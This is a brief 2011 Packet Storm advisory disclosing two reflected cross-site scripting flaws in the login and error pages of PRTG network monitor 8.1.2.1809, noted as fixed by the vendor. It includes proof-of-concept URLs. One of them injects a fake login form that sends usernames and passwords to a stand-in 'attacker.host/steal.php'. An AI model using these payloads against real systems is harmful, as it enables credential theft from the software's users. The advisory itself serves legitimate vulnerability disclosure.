PRTG 8.1.2.1809 Cross Site Scripting

2011-01-26T00:00:00
ID PACKETSTORM:97895
Type packetstorm
Reporter Joshua Gimer
Modified 2011-01-26T00:00:00

Description

                                        
                                            `XSS (Reflected) Bugs in login.htm and error.htm  
================================================================  
PRTG V8.1.2.1809 (All OS Versions):  
http://www.paessler.com/  
  
I have discovered two XSS bugs within PRTG version 8.1.2.1809. These bugs  
are in the login.htm and error.htm documents.  
  
These issues were possible because of a lack of input checking of the errormsg  
and errorurl GET parameters within login.htm. Output encoding  
routines were also  
not consistently used throughout the application.  
  
PoC:  
  
https://localhost/public/login.htm?loginurl=%2Fpublic%2F&errormsg=%3C/div%3E%3C/form%3E%3Ctable%3E%3Cform%20action=%22http://attacker.host/steal.php%22%20method=%22GET%22%3E%3Ctr%3E%3Ctd%3ELogin%20Name:%3C/td%3E%3Ctd%3E%3Cinput%20class=%22text%22%20id=%22loginusername%22%20name=%22username%22%20type=%22text%22%20value=%22%22%20%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20class=%22text%22%20%20id=%22loginpassword%22%20name=%22password%22%20type=%22password%22%20value=%22%22%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Ctd%3E%3Cinput%20id=%22submitter%22%20class=%22submit%22%20type=%22submit%22%20value=%22Login%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E%3C/table%3E%3Ciframe%20width=0%20height=0%20src=%22&loginurl=%2Fhome  
  
https://localhost/error.htm?errormsg=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror=%22javascript:alert%28/test/%29%22/%3E&errorurl=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror=%22javascript:alert%28/test/%29%22/%3E  
  
The vendor was very responsive and has fixed these issues in version  
8.2.0.1898/189 released on January 17th 2011.  
  
--  
Thanks,  
Joshua Gimer  
  
---------------------------  
  
http://www.linkedin.com/in/jgimer  
http://twitter.com/jgimer  
  
`